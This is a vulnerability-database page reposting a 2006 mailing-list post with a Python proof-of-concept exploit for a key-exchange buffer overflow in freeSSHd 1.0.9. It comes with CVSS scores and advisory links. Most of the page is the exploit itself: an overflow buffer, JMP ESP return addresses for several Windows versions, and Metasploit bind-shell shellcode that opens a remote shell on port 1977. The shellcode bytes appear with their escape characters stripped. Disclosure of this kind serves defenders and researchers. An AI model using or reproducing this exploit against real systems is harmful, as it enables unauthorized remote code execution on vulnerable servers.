POC exploit for freeSSHd version 1.0.9

2006.05.17
Credit: Tauqeer Ahmad
Risk: High
Local: Yes
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Also available in Metasploit framework: http://metasploit.com/projects/Framework/modules/exploits/freesshd_key_e xchange.pm david maciejak > Hi all, > > Attachment is the POC exploit for freeSSHd version > 1.0.9 > > Advisories: > http://www.securityfocus.com/bid/17958 > http://www.frsirt.com/english/advisories/2006/1786 > > This was coded for the educational purpose. > > Regards, > > Tauqeer Ahmad > > __________________________________________________ > Do You Yahoo!? > Tired of spam? Yahoo! Mail has the best spam protection around > http://mail.yahoo.com > > #!/usr/bin/env python > > """ > Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0 > ahmadtauqeer[at]yahoo.com > Disclaimer: This Proof of concept exploit is for educational purpose only. > Please do not use it against any system without prior permission. > You are responsible for yourself for what you do with this code. > > Greetings: All the Pakistani White Hats including me ;) > Flames: To all the skript kiddies out there. Man grow up!. > Code tasted against freeSSHd version 1.0.9 > If you didn't get shell at first try, try few times and you will get lucky > > Advisories: > http://www.securityfocus.com/bid/17958 > http://www.frsirt.com/english/advisories/2006/1786 > > """ > import socket > import getopt > import sys > > host = "192.168.0.2" > port = 0 > eip ="" > > #/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */ > shellcode = "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" > "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" > "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" > "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" > "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" > "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" > "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" > "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" > "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" > "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0" > "x66x68x07xb9x66x53x89xe1x95x68xa4x1ax70xc7x57xff" > "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53" > "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff" > "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64" > "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" > "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab" > "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51" > "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53" > "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6" > "x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0" > > > def exploit(): > > buff = "x53x53x48x2dx31x2ex39x39x2dx4fx70x65x6ex53x53x48" > "x5fx33x2ex34x0ax00x00x4fx04x05x14x00x00x00x00x00" > "x00x00x00x00x00x00x00x00x00x00x00x00x00x07xde" > > buff = buff + "A" * 1055 > buff = buff + eip > buff = buff + "yyyy" > buff = buff + "x90" * 4 > buff = buff + shellcode > buff = buff + "B" * 19021 + "rn" > > sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) > sock.connect((host, port)) > print "+ Recive reply from server: " + sock.recv(1000) > > sock.send(buff) > print "+ SSHD exploited. Now telnet to port 1977 to get shell " > print "+ if you didnt get shell in first try.Try again until you success" > > sock.close() > sock = None > > > def usage(): > print "#############################################" > print "# CODED BY TAUQEER AHMAD #" > print "# Scientist #" > print "#############################################" > print "n" > print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0] > print "Following OS supportedn" > print "1 Window XP SP1" > print "2 Window XP SP2" > print "3 Windows 2000 Advanced Server" > > > if __name__ == '__main__': > > if len(sys.argv) < 7: > usage() > sys.exit() > > try: > options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0] > except getopt.GetoptError, err: > print err > usage() > sys.exit() > > > for option, value in options: > if option == '-h': > host = value > if option == '-p': > port = int(value) > if option == '-o': > if value == '1': > eip = "xFCx18xD7x77" # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1) > elif value == '2': > eip = "x0AxAFxD8x77" # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2) > elif value == '3': > eip = "x4Dx3FxE3x77" # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server) > else: > usage() > sys.exit() > > exploit() > > > > > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > >


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top